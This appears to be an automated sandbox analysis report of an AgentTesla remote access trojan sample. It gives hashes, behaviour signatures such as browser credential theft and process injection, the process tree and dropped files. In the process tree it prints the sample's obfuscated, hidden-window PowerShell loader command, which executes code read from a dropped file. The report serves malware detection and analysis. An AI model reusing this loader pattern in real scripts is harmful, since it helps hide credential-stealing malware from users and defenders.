Analysis

  • max time kernel
    147s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05-09-2024 10:27

General

  • Target

    aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe

  • Size

    706KB

  • MD5

    6374e8854e99b03c91f3eabec0327631

  • SHA1

    5bddc6e6aa06c5c7527200f46fbcb4051b0080fc

  • SHA256

    aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96

  • SHA512

    99790ea8a469125600e990c175f8255ab4a26fa6f52a27cced0b325cada4948631b22b10ca50cbf998ad0fbb7d185fa8af3c48b87126bba15f3e52682cf32b20

  • SSDEEP

    12288:YvDJMGRn+cqPnbCHp5T6/b4b/n1yNFwP0nRU9:UDV8cq2HphQbsaeP0W9

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe
    "C:\Users\Admin\AppData\Local\Temp\aa5e1b14dec14bf94e44c6b74ed3b2e97a52a607589bcb385dfa5c4aefa20c96.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Unpartiality=Get-Content 'C:\Users\Admin\AppData\Local\Konfektionernes\Begyndelsesvaerdi.unl';$Rystning=$Unpartiality.SubString(10064,3);.$Rystning($Unpartiality)
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2680
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2756

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Konfektionernes\Begyndelsesvaerdi.unl

    Filesize

    55KB

    MD5

    208dfbe71d1925d841a590fa36ea53b0

    SHA1

    ead752338cc3679678aae24a43a0f77ae663182f

    SHA256

    639d8904b660164e9788b28702b075abb4c70c616c30a566f555fe053fa94006

    SHA512

    b3d3681d00108335ac303544a45a523de035f013740d9cca228752561097f88e6698f11cca9e0c706f7c511285193fcc1b774543612bfd52ec9540e62b546b16

  • C:\Users\Admin\AppData\Local\Konfektionernes\Oktanters.Str

    Filesize

    332KB

    MD5

    095f140bbda8fe02bba77d80449b3ba9

    SHA1

    00a66a1ae19454e700928c7aa68ad7589d532449

    SHA256

    cbc3573c429561a70dff70fe38d3fc592617d8ef344ca825d0d450bb3ce4d4e6

    SHA512

    28852d2ce3e2e56ab60f192d848c26cb8781cd82454d541a772a8daebb64724dccb485954edf52d1455a3ff1f23c056d4e9c1c7604ff41634b6022d5d7fa0e6e

  • memory/2680-13-0x0000000073C70000-0x000000007421B000-memory.dmp

    Filesize

    5.7MB

  • memory/2680-9-0x0000000073C70000-0x000000007421B000-memory.dmp

    Filesize

    5.7MB

  • memory/2680-8-0x0000000073C70000-0x000000007421B000-memory.dmp

    Filesize

    5.7MB

  • memory/2680-11-0x0000000073C70000-0x000000007421B000-memory.dmp

    Filesize

    5.7MB

  • memory/2680-7-0x0000000073C71000-0x0000000073C72000-memory.dmp

    Filesize

    4KB

  • memory/2680-10-0x0000000073C70000-0x000000007421B000-memory.dmp

    Filesize

    5.7MB

  • memory/2680-15-0x0000000073C70000-0x000000007421B000-memory.dmp

    Filesize

    5.7MB

  • memory/2680-16-0x0000000006820000-0x000000000A172000-memory.dmp

    Filesize

    57.3MB

  • memory/2680-17-0x0000000073C70000-0x000000007421B000-memory.dmp

    Filesize

    5.7MB

  • memory/2756-18-0x0000000000F90000-0x0000000001FF2000-memory.dmp

    Filesize

    16.4MB

  • memory/2756-19-0x0000000000F90000-0x0000000001FF2000-memory.dmp

    Filesize

    16.4MB

  • memory/2756-20-0x0000000000F90000-0x0000000000FD0000-memory.dmp

    Filesize

    256KB